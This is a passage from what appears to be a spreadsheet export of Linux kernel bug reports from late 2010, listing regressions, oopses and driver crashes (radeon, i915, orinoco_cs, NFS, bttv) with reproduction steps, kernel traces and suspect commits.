    <t>Created attachment 37912 [details] dmesg with added WARN_ON() on atom_execute_table_locked During Xorg shutdown, dmesg gets filled with lots of repeating: [ 101.804993] [drm:atom_op_jump] *ERROR* atombios stuck in loop for more than 5secs aborting [ 101.805045] [drm:atom_execute_table_locked] *ERROR* atombios stuck executing CD0C (len 62, WS 0, PS 0) @ 0xCD28 Xorg does NOT terminate properly until after a handful of these messages, so the system takes a long time to shutdown. Steps to reproduce, on a Acer 5820TG (Intel Clarkdale+Radeon Evergreen switchable graphics): 1. Boot kernel with vgaswitcheroo enabled. 2. Start Xorg with no xorg.conf. Defaults to using Intel card. 3. While Xorg is running, echo OFF &gt; /sys/kernel/debug/vgaswitcheroo/switch (powers off the Radeon card). 4. Try to quit Xorg (either by SIGTERM or Zap key sequence). Expected result: Xorg quits in a few seconds Actual results: Lots of messages on dmesg, Xorg takes minutes to die. For convenience, I added a WARN_ON() on atom_execute_table_locked() right where it printks the above warning message. The resulting backtrace is attached. Seemingly, drm_helper_disable_unused_functions is called by the Intel driver which ends up calling some Readeon DPMS functions (atombios_crtc_disable) which eventually try to run Atombios code while rdev-&gt;powered_down is TRUE. A trivial workaround is to patch atombios_crtc_disable and do nothing if rdev-&gt;powered_down is TRUE. That works for me but I don't really know if it's exactly the ideal solution.</t>
  </si>
  <si>
    <t>kmemleak in cpufreq_register_driver</t>
  </si>
  <si>
    <t>2.6.36.1</t>
  </si>
  <si>
    <t>2010-11-25 08:48 UTC</t>
  </si>
  <si>
    <t>Created attachment 38162 [details] kmemleak Yesterday I got the attached kmemleak after a ThinkPad T400 was waked from s2ram: unreferenced object 0xf5cb8b00 (size 64): comm "modprobe", pid 1016, jiffies 4294676606 (age 39077.100s) hex dump (first 32 bytes): 00 00 00 00 e8 a2 24 00 01 00 00 00 00 9f 24 00 ......$.......$. 02 00 00 00 00 6a 18 00 03 00 00 00 00 35 0c 00 .....j.......5.. backtrace: [&lt;c1253837&gt;] kmemleak_alloc+0x27/0x50 [&lt;c10b042f&gt;] __kmalloc+0xbf/0x120 [&lt;f9a807ee&gt;] acpi_cpufreq_cpu_init+0x1ee/0x4e4 [acpi_cpufreq] [&lt;c11e3ef2&gt;] cpufreq_add_dev+0x142/0x3a0 [&lt;c11a82f7&gt;] sysdev_driver_register+0x97/0x110 [&lt;c11e3456&gt;] cpufreq_register_driver+0x86/0x140 [&lt;f9a84080&gt;] 0xf9a84080 [&lt;c1001130&gt;] do_one_initcall+0x30/0x160 [&lt;c1064909&gt;] sys_init_module+0x99/0x1e0 [&lt;c1002d53&gt;] sysenter_do_call+0x12/0x22 [&lt;ffffffff&gt;] 0xffffffff ... Much more are attached onto this bug report.</t>
  </si>
  <si>
    <t>drm/radeon/kms -- hang during boot unless using "nomodeset"</t>
  </si>
  <si>
    <t>2.6.37-rc3</t>
  </si>
  <si>
    <t>2010-11-25 15:37 UTC</t>
  </si>
  <si>
    <t>2010-12-02 21:40 UTC</t>
  </si>
  <si>
    <t>Created attachment 38212 [details] lspci-info.txt Boot hangs very early unless nomodeset is used. No disk access is observed and box never becomes available on the network. The box is an HP 8530p laptop. Normal functionality is restored by reverting this patch: commit bdd91b2b571c80dacfca88667d935f9907e62931 Author: Tyson Whitehead &lt;twhitehead@gmail.com&gt; Date: Mon Nov 8 16:08:30 2010 +0000 drm/radeon/kms: fix bugs in ddc and cd path router code This is a follow on to: 2b5b1d7da9583484b3a9e7e375a90ca0e8ca07c2 (drm/radeon/kms: add support for clock/data path routers) That patch completed mux support for ddc and cd line routing between connectors. This patch fixes an indexing typo that was resulting in the atom bios router objects not always being walked, ensures the validity entries for the reused router structure are reset for every connector object walked, and corrects the masking operations used to update the mux control bits. Fixes: https://bugs.freedesktop.org/show_bug.cgi?id=31339 Signed-off-by: Tyson Whitehead &lt;twhitehead@gmail.com&gt; Signed-off-by: Alex Deucher &lt;alexdeucher@gmail.com&gt; Signed-off-by: Dave Airlie &lt;airlied@redhat.com&gt;</t>
  </si>
  <si>
    <t>kernel 2.6.37-rc2 breaks i915 graphics</t>
  </si>
  <si>
    <t>2010-11-25 20:10 UTC</t>
  </si>
  <si>
    <t>2010-12-19 11:33 UTC</t>
  </si>
  <si>
    <t>Subject : kernel 2.6.37-rc2 breaks i915 graphics Submitter : Chris Vine &lt;chris@cvine.freeserve.co.uk&gt; Date : 2010-11-21 10:23 Message-ID : 20101121102344.7c590b99@laptop.homenet References : http://marc.info/?l=linux-kernel&amp;m=129033505414671&amp;w=2 This entry is being used for tracking a regression from 2.6.36. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>[Regression, post-2.6.37-rc2] Unable to start KDE with 2.6.37-rc3 on Acer Ferrari One</t>
  </si>
  <si>
    <t>2010-11-28 13:24 UTC</t>
  </si>
  <si>
    <t>2010-11-30 10:42 UTC</t>
  </si>
  <si>
    <t>Subject : [Regression, post-2.6.37-rc2] Unable to start KDE with 2.6.37-rc3 on Acer Ferrari One Submitter : "Rafael J. Wysocki" &lt;rjw@sisk.pl&gt; Date : 2010-11-24 0:22 Message-ID : 201011240122.33174.rjw@sisk.pl References : http://marc.info/?l=linux-kernel&amp;m=129055824500437&amp;w=2 This entry is being used for tracking a regression from 2.6.36. Please don't close it until the problem is fixed in the mainline. Caused by: commit 16790569eddf4d406a16a65f4750f405fa669c52 Author: Alex Deucher &lt;alexdeucher@gmail.com&gt; Date: Sun Nov 14 20:24:35 2010 -0500 drm/radeon/kms: fix and unify tiled buffer alignment checking for r6xx/7xx First-Bad-Commit : 16790569eddf4d406a16a65f4750f405fa669c52</t>
  </si>
  <si>
    <t>fcntl(..., F_GETLK, ...) does not return correct info about a read lock which is set on server</t>
  </si>
  <si>
    <t>2.6.22-rc1 and higher</t>
  </si>
  <si>
    <t>2010-11-28 14:49 UTC</t>
  </si>
  <si>
    <t>Alexander Morozov</t>
  </si>
  <si>
    <t>2013-10-11 21:15 UTC</t>
  </si>
  <si>
    <t>Created attachment 38442 [details] Programs for reproducing Environment: Debian Lenny with kernel 2.6.37-rc3 i686 nfs-common 1:1.1.2-6lenny2 nfs-kernel-server 1:1.1.2-6lenny2 172.22.0.10 is a server 172.22.0.11 is a client /etc/exports on a server: /srv/test 172.22.0.11(rw,sync,no_subtree_check) Steps to reproduce: client# mount -t nfs 172.22.0.10:/srv/test /srv/test server$ cd /srv/test server$ ./linlock r file press Ctrl-C... client$ cd /srv/test client$ ./linlock w file fcntl: Resource temporary unavailable client$ ./lockinfo file F_UNLCK SEEK_SET start 0 len 0 ./linlock tool set read (r) or write (w) lock on a file. ./lockinfo shows what F_GETLK returns. This test shows that a client can not set a write lock on a read lock of server but F_GETLK tells that file is not locked. The bug does not occur if client with 2.6.21 kernel. The bug occurs if client with 2.6.22-rc1 and higher.</t>
  </si>
  <si>
    <t>[BUG] 2.6.37-rc3 massive interactivity regression on ARM</t>
  </si>
  <si>
    <t>2010-11-28 15:07 UTC</t>
  </si>
  <si>
    <t>2010-12-30 18:29 UTC</t>
  </si>
  <si>
    <t>Subject : [BUG] 2.6.37-rc3 massive interactivity regression on ARM Submitter : Mikael Pettersson &lt;mikpe@it.uu.se&gt; Date : 2010-11-27 15:16 Message-ID : 19697.8378.717761.236202@pilspetsen.it.uu.se References : http://marc.info/?l=linux-kernel&amp;m=129087098911837&amp;w=2 This entry is being used for tracking a regression from 2.6.36. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>orinoco_cs BUG: sleeping function called from invalid context</t>
  </si>
  <si>
    <t>2.6.35.6-48.fc14.i686</t>
  </si>
  <si>
    <t>2010-11-28 19:41 UTC</t>
  </si>
  <si>
    <t>2011-01-23 16:24 UTC</t>
  </si>
  <si>
    <t>Kernel BUG reported when running 'modprobe orinico_cs' on Fedora 14 release kernel 2.6.35.6-48.fc14.i686. Seen on two different laptops with similar orinico_cs wireless cards. Fedora's kernel has no patches to this driver to distinguish it from mainline. Does not fail with Fedora 12 kernel-PAE-2.6.32.23-170.fc12.i686 Trace follows. [ 378.882649] orinoco_cs 0.15 (David Gibson &lt;hermes@gibson.dropbear.id.au&gt;, Pavel Roskin &lt;proski@gnu.org&gt;, et al) [ 378.882928] BUG: sleeping function called from invalid context at arch/x86/mm/fault.c:1074 [ 378.882946] in_atomic(): 0, irqs_disabled(): 1, pid: 1843, name: modprobe [ 378.882962] Pid: 1843, comm: modprobe Not tainted 2.6.35.6-48.fc14.i686 #1 [ 378.882973] Call Trace: [ 378.883009] [&lt;c042ada5&gt;] __might_sleep+0xc3/0xca [ 378.883036] [&lt;c07a9d3e&gt;] do_page_fault+0x146/0x275 [ 378.883042] [&lt;c07a9bf8&gt;] ? do_page_fault+0x0/0x275 [ 378.883042] [&lt;c07a7acf&gt;] error_code+0x73/0x78 [ 378.883042] [&lt;d895802c&gt;] ? orinoco_lock+0x1d/0x42 [orinoco] [ 378.883042] [&lt;d8959e13&gt;] orinoco_interrupt+0x34/0x351 [orinoco] [ 378.883042] [&lt;c045e1d5&gt;] ? __raw_local_irq_save+0x19/0x1e [ 378.883042] [&lt;c045e1d5&gt;] ? __raw_local_irq_save+0x19/0x1e [ 378.883042] [&lt;c04834ba&gt;] ? synchronize_irq+0x3c/0xab [ 378.883042] [&lt;c07a702d&gt;] ? _raw_spin_unlock_irqrestore+0x13/0x15 [ 378.883042] [&lt;c0483ac9&gt;] ? disable_irq_nosync+0x51/0x57 [ 378.883042] [&lt;c04840dd&gt;] request_threaded_irq+0x12e/0x147 [ 378.883042] [&lt;d8959ddf&gt;] ? orinoco_interrupt+0x0/0x351 [orinoco] [ 378.883042] [&lt;c0693949&gt;] pcmcia_request_irq+0x2f/0x41 [ 378.883042] [&lt;d893e13f&gt;] orinoco_cs_probe+0x76/0xee [orinoco_cs] [ 378.883042] [&lt;c0691ab5&gt;] pcmcia_device_probe+0x133/0x210 [ 378.883042] [&lt;c0650f00&gt;] ? driver_sysfs_add+0x10/0x53 [ 378.883042] [&lt;c0651262&gt;] driver_probe_device+0x114/0x20d [ 378.883042] [&lt;c06513a3&gt;] __driver_attach+0x48/0x64 [ 378.883042] [&lt;c0650445&gt;] bus_for_each_dev+0x42/0x65 [ 378.883042] [&lt;c0650eee&gt;] driver_attach+0x19/0x1b [ 378.883042] [&lt;c065135b&gt;] ? __driver_attach+0x0/0x64 [ 378.883042] [&lt;c0650b75&gt;] bus_add_driver+0xc9/0x215 [ 378.883042] [&lt;c05b0c32&gt;] ? kset_find_obj+0x12/0x4e [ 378.883042] [&lt;c065157d&gt;] driver_register+0x7c/0xdb [ 378.883042] [&lt;c06924b9&gt;] pcmcia_register_driver+0xdd/0x11e [ 378.883042] [&lt;d8968000&gt;] ? init_orinoco_cs+0x0/0x1e [orinoco_cs] [ 378.883042] [&lt;d896801c&gt;] init_orinoco_cs+0x1c/0x1e [orinoco_cs] [ 378.883042] [&lt;c0401246&gt;] do_one_initcall+0x4f/0x139 [ 378.883042] [&lt;c0451e51&gt;] ? blocking_notifier_call_chain+0x11/0x13 [ 378.883042] [&lt;c04621a4&gt;] sys_init_module+0x7f/0x19b [ 378.883042] [&lt;c07a73cc&gt;] syscall_call+0x7/0xb [ 378.883042] BUG: unable to handle kernel NULL pointer dereference at 00000030 [ 378.883042] IP: [&lt;d895802c&gt;] orinoco_lock+0x1d/0x42 [orinoco] [ 378.883042] *pde = 00000000 [ 378.883042] Oops: 0000 [#1] SMP [ 378.883042] last sysfs file: /sys/devices/platform/regulatory.0/uevent [ 378.883042] Modules linked in: orinoco_cs(+) orinoco cfg80211 rfkill fuse ip6t_REJECT nf_conntrack_ipv6 ip6table_filter ip6_tables ipv6 snd_maestro3 snd_ac97_codec ac97_bus ppdev snd_seq snd_seq_device parpo rt_pc microcode dcdbas parport snd_pcm snd_timer snd_page_alloc snd i2c_piix4 i2c_core 3c59x joydev soundcore mii video yenta_socket output [last unloaded: mperf] [ 378.883042] [ 378.883042] Pid: 1843, comm: modprobe Not tainted 2.6.35.6-48.fc14.i686 #1 Inspiron 3800 C600GT /Inspiron 3800 C600GT [ 378.883042] EIP: 0060:[&lt;d895802c&gt;] EFLAGS: 00010046 CPU: 0 [ 378.883042] EIP is at orinoco_lock+0x1d/0x42 [orinoco] [ 378.883042] EAX: d52ac4e0 EBX: d52ac2a0 ECX: 00000000 EDX: d648de14 [ 378.883042] ESI: d648de14 EDI: d52ac4e0 EBP: d648ddd8 ESP: d648ddcc [ 378.883042] DS: 007b ES: 007b FS: 00d8 GS: 00e0 SS: 0068 [ 378.883042] Process modprobe (pid: 1843, ti=d648c000 task=d5add860 task.ti=d648c000) [ 378.883042] Stack: [ 378.883042] 00000282 d52ac2a0 00000000 d648de38 d8959e13 c045e1d5 d648ddf0 c045e1d5 [ 378.883042] &lt;0&gt; 00000292 00000292 d648ddfc d52ac5bc d648de28 c04834ba c097fd58 d648de10 [ 378.883042] &lt;0&gt; c07a702d d648de28 c0483ac9 00000286 00000003 c097fd00 c097fd00 c77bb1e9 [ 378.883042] Call Trace: [ 378.883042] [&lt;d8959e13&gt;] ? orinoco_interrupt+0x34/0x351 [orinoco] [ 378.883042] [&lt;c045e1d5&gt;] ? __raw_local_irq_save+0x19/0x1e [ 378.883042] [&lt;c045e1d5&gt;] ? __raw_local_irq_save+0x19/0x1e [ 378.883042] [&lt;c04834ba&gt;] ? synchronize_irq+0x3c/0xab [ 378.883042] [&lt;c07a702d&gt;] ? _raw_spin_unlock_irqrestore+0x13/0x15 [ 378.883042] [&lt;c0483ac9&gt;] ? disable_irq_nosync+0x51/0x57 [ 378.883042] [&lt;c04840dd&gt;] ? request_threaded_irq+0x12e/0x147 [ 378.883042] [&lt;d8959ddf&gt;] ? orinoco_interrupt+0x0/0x351 [orinoco] [ 378.883042] [&lt;c0693949&gt;] ? pcmcia_request_irq+0x2f/0x41 [ 378.883042] [&lt;d893e13f&gt;] ? orinoco_cs_probe+0x76/0xee [orinoco_cs] [ 378.883042] [&lt;c0691ab5&gt;] ? pcmcia_device_probe+0x133/0x210 [ 378.883042] [&lt;c0650f00&gt;] ? driver_sysfs_add+0x10/0x53 [ 378.883042] [&lt;c0651262&gt;] ? driver_probe_device+0x114/0x20d [ 378.883042] [&lt;c06513a3&gt;] ? __driver_attach+0x48/0x64 [ 378.883042] [&lt;c0650445&gt;] ? bus_for_each_dev+0x42/0x65 [ 378.883042] [&lt;c0650eee&gt;] ? driver_attach+0x19/0x1b [ 378.883042] [&lt;c065135b&gt;] ? __driver_attach+0x0/0x64 [ 378.883042] [&lt;c0650b75&gt;] ? bus_add_driver+0xc9/0x215 [ 378.883042] [&lt;c05b0c32&gt;] ? kset_find_obj+0x12/0x4e [ 378.883042] [&lt;c065157d&gt;] ? driver_register+0x7c/0xdb [ 378.883042] [&lt;c06924b9&gt;] ? pcmcia_register_driver+0xdd/0x11e [ 378.883042] [&lt;d8968000&gt;] ? init_orinoco_cs+0x0/0x1e [orinoco_cs] [ 378.883042] [&lt;d896801c&gt;] ? init_orinoco_cs+0x1c/0x1e [orinoco_cs] [ 378.883042] [&lt;c0401246&gt;] ? do_one_initcall+0x4f/0x139 [ 378.883042] [&lt;c0451e51&gt;] ? blocking_notifier_call_chain+0x11/0x13 [ 378.883042] [&lt;c04621a4&gt;] ? sys_init_module+0x7f/0x19b [ 378.883042] [&lt;c07a73cc&gt;] ? syscall_call+0x7/0xb [ 378.883042] Code: 89 e5 0f 1f 44 00 00 3e 80 60 08 fe 5d c3 55 89 e5 57 56 53 0f 1f 44 00 00 8b 88 28 03 00 00 89 c3 89 d6 8d b8 40 02 00 00 89 f8 &lt;ff&gt; 51 30 31 c0 83 bb 44 02 00 00 00 74 12 8b 8b 28 03 00 0 0 89 [ 378.883042] EIP: [&lt;d895802c&gt;] orinoco_lock+0x1d/0x42 [orinoco] SS:ESP 0068:d648ddcc [ 378.883042] CR2: 0000000000000030 [ 378.883042] ---[ end trace a3eecd9d8c3040c5 ]---</t>
  </si>
  <si>
    <t>Bisected regression: kernel won't boot (MCP55 bridge)</t>
  </si>
  <si>
    <t>2.6.37-rc1+</t>
  </si>
  <si>
    <t>2010-11-28 21:46 UTC</t>
  </si>
  <si>
    <t>Mathieu Bérard</t>
  </si>
  <si>
    <t>2011-01-23 15:32 UTC</t>
  </si>
  <si>
    <t>Hello, somewhere between v2.6.36 and v2.6.37-rc1, the kernel stopped booting on my machine. The boot process stops at "Freeing initrd memory: [..]k freed" and after that the machine is completely hard locked. After a thrilling git bisect session, the guilty commit was found: 66db60eaf158aa953651d03e43e931e757e87262 PCI: add quirk for non-symmetric-mode irq routing to versions 0 and 4 of the MCP55 northbridge reverting that commit indeed fixes the bug lspci says: 00:00.0 RAM memory [0500]: nVidia Corporation MCP55 Memory Controller [10de:0369] (rev a1) 00:01.0 ISA bridge [0601]: nVidia Corporation MCP55 LPC Bridge [10de:0360] (rev a2) 00:01.1 SMBus [0c05]: nVidia Corporation MCP55 SMBus [10de:0368] (rev a2) 00:02.0 USB Controller [0c03]: nVidia Corporation MCP55 USB Controller [10de:036c] (rev a1) 00:02.1 USB Controller [0c03]: nVidia Corporation MCP55 USB Controller [10de:036d] (rev a2) 00:04.0 IDE interface [0101]: nVidia Corporation MCP55 IDE [10de:036e] (rev a1) 00:05.0 IDE interface [0101]: nVidia Corporation MCP55 SATA Controller [10de:037f] (rev a2) 00:05.1 IDE interface [0101]: nVidia Corporation MCP55 SATA Controller [10de:037f] (rev a2) 00:05.2 IDE interface [0101]: nVidia Corporation MCP55 SATA Controller [10de:037f] (rev a2) 00:06.0 PCI bridge [0604]: nVidia Corporation MCP55 PCI bridge [10de:0370] (rev a2) 00:06.1 Audio device [0403]: nVidia Corporation MCP55 High Definition Audio [10de:0371] (rev a2) 00:08.0 Bridge [0680]: nVidia Corporation MCP55 Ethernet [10de:0373] (rev a2) 00:0f.0 PCI bridge [0604]: nVidia Corporation MCP55 PCI Express bridge [10de:0377] (rev a2) 00:18.0 Host bridge [0600]: Advanced Micro Devices [AMD] Family 10h Processor HyperTransport Configuration [1022:1200] 00:18.1 Host bridge [0600]: Advanced Micro Devices [AMD] Family 10h Processor Address Map [1022:1201] 00:18.2 Host bridge [0600]: Advanced Micro Devices [AMD] Family 10h Processor DRAM Controller [1022:1202] 00:18.3 Host bridge [0600]: Advanced Micro Devices [AMD] Family 10h Processor Miscellaneous Control [1022:1203] 00:18.4 Host bridge [0600]: Advanced Micro Devices [AMD] Family 10h Processor Link Control [1022:1204] 02:00.0 VGA compatible controller [0300]: ATI Technologies Inc Cypress [Radeon HD 5800 Series] [1002:6899] 02:00.1 Audio device [0403]: ATI Technologies Inc Cypress HDMI Audio [Radeon HD 5800 Series] [1002:aa50]</t>
  </si>
  <si>
    <t>Commit g18733b0 hangs my LVM+raid10 system</t>
  </si>
  <si>
    <t>2.6.37-rc3-00325-g4492862</t>
  </si>
  <si>
    <t>2010-11-29 19:48 UTC</t>
  </si>
  <si>
    <t>Giacomo Catenazzi</t>
  </si>
  <si>
    <t>2010-12-19 11:58 UTC</t>
  </si>
  <si>
    <t>Hello, the commit be20e6c67b6c6024c19094d3447f144d1 block the boot process of my machine (Debian sid), at mdadm. Sometime, pressing with C-C or SysRc-S+E) I can continue the boot process (but not always), but without being able to mount /home (and /pub). "sync" hangs hard. I see no oops or other "strange" message in dmesg. My home system has 4 disks, with a LVM+raid10 configuration. Note: root partition seems to be mounted correctly (also on the same LVM+raid10 configuration). ciao cate</t>
  </si>
  <si>
    <t>time-stamping in phy devices causes kernel panic</t>
  </si>
  <si>
    <t>2010-11-30 19:19 UTC</t>
  </si>
  <si>
    <t>2011-01-23 16:19 UTC</t>
  </si>
  <si>
    <t>24292 24452</t>
  </si>
  <si>
    <t>The 'time stamping in phy devices' code introduced in 2.6.36 (c1f19b51d1d87f3e3bb7e6648f43f7d57ed2da6b et al.) triggers kernel panics when wireless devices are placed in monitor mode (tested with b43 and ath5k devices on a 32-bit system). To reproduce, set CONFIG_NETWORK_PHY_TIMESTAMPING=y and put a wireless device into monitor mode: # ifconfig wlan0 down # iwconfig wlan0 mode monitor # ifconfig wlan0 up ~ Andy</t>
  </si>
  <si>
    <t>Crash at boot in udev while accessing bt848 device in 2.6.37-rc*</t>
  </si>
  <si>
    <t>2.6.37-rc*</t>
  </si>
  <si>
    <t>2010-11-30 20:50 UTC</t>
  </si>
  <si>
    <t>2010-12-22 18:42 UTC</t>
  </si>
  <si>
    <t>Config: AMD Athlon64 X2 4200 in 64 bits mode Slackware 64 13.1 Bttv 848 based card (Pinnacle) Last knowns working version : 2.6.36.1 Since 2.6.37-rc4, the bttv driver doesn't work: - it isn't proposed anymore in make menuconfig / Multimedia section; - after boot, /dev/video0 is not there anymore; - there is no message from the driver in dmesg; - when exiting make menuconfig and when entering driver selection, I get warnings from kbuild saying something has missing dependencies. Note: The driver is built-in in my previous kernel, I just copied the .config from the 2.6.36 and tried to use it in 2.6.37. If I try previous kernel versions (from 2.6.37-rc1 to 2.6.37-rc3), the bttv driver seems to be loaded, but the kernel crashes and freeze totally at boot, when udev is started and seems to see the v4l device. Note2: it crashes with a warning I cannot read due to scroll. I'm using kernel debug options (kmemcheck, lock validator). For more info, working dmesg output: Linux video capture interface: v2.00 bttv: driver version 0.9.18 loaded bttv: using 8 buffers with 2080k (520 pages) each for capture bttv: Bt8xx card found (0). bttv 0000:02:06.0: PCI INT A -&gt; GSI 18 (level, low) -&gt; IRQ 18 bttv0: Bt848 (rev 18) at 0000:02:06.0, irq: 18, latency: 32, mmio: 0xdc8ff000 bttv0: using: MIRO PCTV [card=1,insmod option] bttv0: gpio: en=00000000, out=00000000 in=00ff27ff [init] bttv0: i2c: checking for MSP34xx @ 0x80... not found bttv0: miro: id=9 tuner=3 radio=no stereo=no bttv0: tuner type=3 bttv0: audio absent, no audio device found! All bytes are equal. It is not a TEA5767 tuner 1-0060: chip found @ 0xc0 (bt848 #0 [sw]) tuner-simple 1-0060: creating new instance tuner-simple 1-0060: type set to 3 (Philips (SECAM+PAL_BG) (FI1216MF, FM1216MF, FR1216MF)) bttv0: registered device video0 bttv0: registered device vbi0 Working lspci: 02:06.0 Multimedia video controller: Brooktree Corporation Bt848 Video Capture (rev 12) Flags: bus master, medium devsel, latency 32, IRQ 18 Memory at dc8ff000 (32-bit, prefetchable) [size=4K] Kernel driver in use: bttv</t>
  </si>
  <si>
    <t>[830] drm:intel_prepare_page_flip, *ERROR* Prepared flip multiple times</t>
  </si>
  <si>
    <t>2.6.36.1-3</t>
  </si>
  <si>
    <t>2010-12-02 14:10 UTC</t>
  </si>
  <si>
    <t>2012-07-01 10:31 UTC</t>
  </si>
  <si>
    <t>I have an IBM Thinkpad x30 with an Intel Almador(830MG) graphics card. I run lightweight Archlinux with Xfce. Something strange happened with my system after yesterdays upgrade. Finally I realised it's the full root partition. After removing appriopriate logs and restarting syslog-ng I extracted what caused the problem: fullscreen MatrixGL screensaver from xscreensaver's package have generated dozens of same messages in kernel log: drm:intel_prepare_page_flip, *ERROR* Prepared flip multiple times It happened after the latest kernel update: [2010-11-30 20:06] upgraded kernel26 (2.6.35.8-1 -&gt; 2.6.36.1-3) There were also other packages updated: [2010-11-30 19:49] Running 'pacman -Syu' [2010-11-30 19:49] synchronizing package lists [2010-11-30 19:49] starting full system upgrade [2010-11-30 20:03] upgraded udev (163-1 -&gt; 164-1) [2010-11-30 20:03] upgraded device-mapper (2.02.76-1 -&gt; 2.02.77-1) [2010-11-30 20:03] upgraded findutils (4.4.2-2 -&gt; 4.4.2-3) [2010-11-30 20:03] upgraded gcc-libs (4.5.1-1 -&gt; 4.5.1-2) [2010-11-30 20:03] upgraded gpm (1.20.6-5 -&gt; 1.20.6-6) [2010-11-30 20:03] upgraded hyphen (2.6-1 -&gt; 2.7-1) [2010-11-30 20:03] upgraded libdrm (2.4.21-2 -&gt; 2.4.22-1) [2010-11-30 20:03] upgraded libgl (7.8.2-3 -&gt; 7.9-1) [2010-11-30 20:03] upgraded intel-dri (7.8.2-3 -&gt; 7.9-1) [2010-11-30 20:06] upgraded libpurple (2.7.6-1 -&gt; 2.7.7-1) [2010-11-30 20:06] upgraded libtasn1 (2.6-1 -&gt; 2.8-1) [2010-11-30 20:06] upgraded libvpx (0.9.5-1 -&gt; 0.9.5-2) [2010-11-30 20:06] upgraded libx11 (1.3.5-2 -&gt; 1.4.0-1) [2010-11-30 20:06] upgraded mesa (7.8.2-3 -&gt; 7.9-1) [2010-11-30 20:06] upgraded sdl (1.2.14-5 -&gt; 1.2.14-6) [2010-11-30 20:06] installed libasyncns (0.8-3) [2010-11-30 20:06] installed libpulse (0.9.22-1) [2010-11-30 20:06] upgraded pcre (8.10-1 -&gt; 8.10-2) [2010-11-30 20:06] upgraded xf86-video-intel (2.12.0-3 -&gt; 2.13.0-4) [2010-11-30 20:06] upgraded xine-lib (1.1.19-1 -&gt; 1.1.19-2) [2010-11-30 20:06] upgraded xorg-server-common (1.9.2-1 -&gt; 1.9.2-2) [2010-11-30 20:06] upgraded xorg-server (1.9.2-1 -&gt; 1.9.2-2) More info: https://bugs.archlinux.org/task/21927</t>
  </si>
  <si>
    <t>iotop reports insane per-process disk read/write statistics</t>
  </si>
  <si>
    <t>2.6.37-rc4-00153-g59e57c6</t>
  </si>
  <si>
    <t>2010-12-03 12:00 UTC</t>
  </si>
  <si>
    <t>2011-01-02 12:28 UTC</t>
  </si>
  <si>
    <t>With a recent kernel, iotop is producing data like this: Total DISK READ: 817.54 B/s | Total DISK WRITE: 161.41 K/s TID PRIO USER DISK READ DISK WRITE SWAPIN IO&gt; COMMAND 297 be/4 root 545.03 G/s 223.02 T/s 0.00 % 99.99 % [btrfs-transacti] 286 be/4 root 0.00 B/s 0.00 B/s 0.00 % 99.99 % [btrfs-submit-0] 3914 be/4 brian 0.00 B/s 73.45 T/s 0.00 % 99.99 % firefox-4.0-bin 2901 be/4 brian 545.03 G/s 15.44 T/s 0.00 % 99.99 % thunderbird-bin 853 be/4 root 0.00 B/s 0.00 B/s 0.00 % 99.99 % [flush-btrfs-1] 2145 be/4 brian 0.00 B/s 13.31 T/s 0.00 % 0.00 % firefox-4.0-bin 287 be/4 root 0.00 B/s 3.19 T/s 0.00 % 0.00 % [btrfs-delalloc-] 1417 be/4 root 0.00 B/s 58.02 T/s 0.00 % 0.00 % master 3549 be/4 brian 0.00 B/s 3.19 T/s 0.00 % 0.00 % indicator-applet-complete 1682 be/4 root 0.00 B/s 79.31 T/s 0.00 % 0.00 % [btrfs-endio-wri] 3905 be/4 syslog 0.00 B/s 20.23 T/s 0.00 % 0.00 % rsyslogd -c4 1906 be/4 brian 0.00 B/s 10.11 T/s 0.00 % 0.00 % nm-applet --sm-disable The above was an average over 30 seconds (iotop -d 30), so plenty of programs had a chance to do a tiny bit of disk activity. It looks like the totals are correct, but the per-process numbers are way out of whack. I've even seen P/s reported before. I've observed this on two amd64 machines and haven't tested i386. Both machines have btrfs and ext4, and the problem shows up with access to either. 2.6.36 produces correct results.</t>
  </si>
  <si>
    <t>Kernel crashes when repeatedly trying to mount nfs share that is failing</t>
  </si>
  <si>
    <t>2.6.32, 2.6.37-rc3</t>
  </si>
  <si>
    <t>2010-12-03 20:20 UTC</t>
  </si>
  <si>
    <t>Stefan Bader</t>
  </si>
  <si>
    <t>2011-01-24 12:51 UTC</t>
  </si>
  <si>
    <t>ARCH: x86_64 (not tested on i386) Testcase: On the server side, configure an export that will be denied to mount (used sec=krb5 as that gives a permission denied for me) --- server /etc/exports --- /foo *(rw,krb5) On the client side, autofs gets configured to try to automount server:/foo --- client /etc/auto.master --- /auto /etc/auto.auto --- client /etc/auto.auto --- foo -tcp server:/foo [optional] Stop the autofs service and start the automounter in the foreground (automount -d -f) to see the permission denied message. Create a symlink pointing to the autofs: ln -s /auto/foo foo The following is done in a loop as the crash sometimes takes longer than other times: while true; do ls foo/; sleep 1; done It seems to take longer on the newest kernel, but eventually there will be a panic.</t>
  </si>
  <si>
    <t>[i915] null pointer dereference on modprobe in intel_svdo_read_byte.clone.8</t>
  </si>
  <si>
    <t>2010-12-05 01:55 UTC</t>
  </si>
  <si>
    <t>2012-08-29 14:34 UTC</t>
  </si>
  <si>
    <t>The i915 module in Natty's 2.6.37-rc3-7 (and perhaps others) kernel oopses with a null pointer dereference on boot on my i915GM-based Dell Latitude D610 as seen below, [ 16.693732] i915 0000:00:02.0: PCI INT A -&gt; GSI 16 (level, low) -&gt; IRQ 16 [ 16.693741] i915 0000:00:02.0: setting latency timer to 64 [ 16.753618] BUG: unable to handle kernel NULL pointer dereference at (null) [ 16.753753] IP: [&lt;c04ca13e&gt;] i2c_transfer+0x1e/0xc0 [ 16.753851] *pde = 3f032067 [ 16.753940] Oops: 0000 [#1] SMP [ 16.754060] last sysfs file: /sys/module/ssb/initstate [ 16.754124] Modules linked in: i915(+) b43(+) snd_seq_device mac80211 drm_kms_helper drm sunrpc cfg80211 yenta_socket dell_laptop pcmcia_rsrc snd dcdbas psmouse pcmcia_core i2c_algo_bit video shpchp soundcore serio_raw snd_page_alloc output lp parport tg3 ssb [ 16.755116] [ 16.755171] Pid: 341, comm: modprobe Not tainted 2.6.37-7-generic #19-Ubuntu 0U8082/Latitude D610 [ 16.755267] EIP: 0060:[&lt;c04ca13e&gt;] EFLAGS: 00010296 CPU: 0 [ 16.755331] EIP is at i2c_transfer+0x1e/0xc0 [ 16.755392] EAX: 00000000 EBX: ffffffa1 ECX: 00000002 EDX: f35b5c4c [ 16.755458] ESI: f367b748 EDI: f35b5ccf EBP: f35b5c2c ESP: f35b5c14 [ 16.755524] DS: 007b ES: 007b FS: 00d8 GS: 00e0 SS: 0068 [ 16.755589] Process modprobe (pid: 341, ti=f35b4000 task=f358a5e0 task.ti=f35b4000) [ 16.755675] Stack: [ 16.755729] 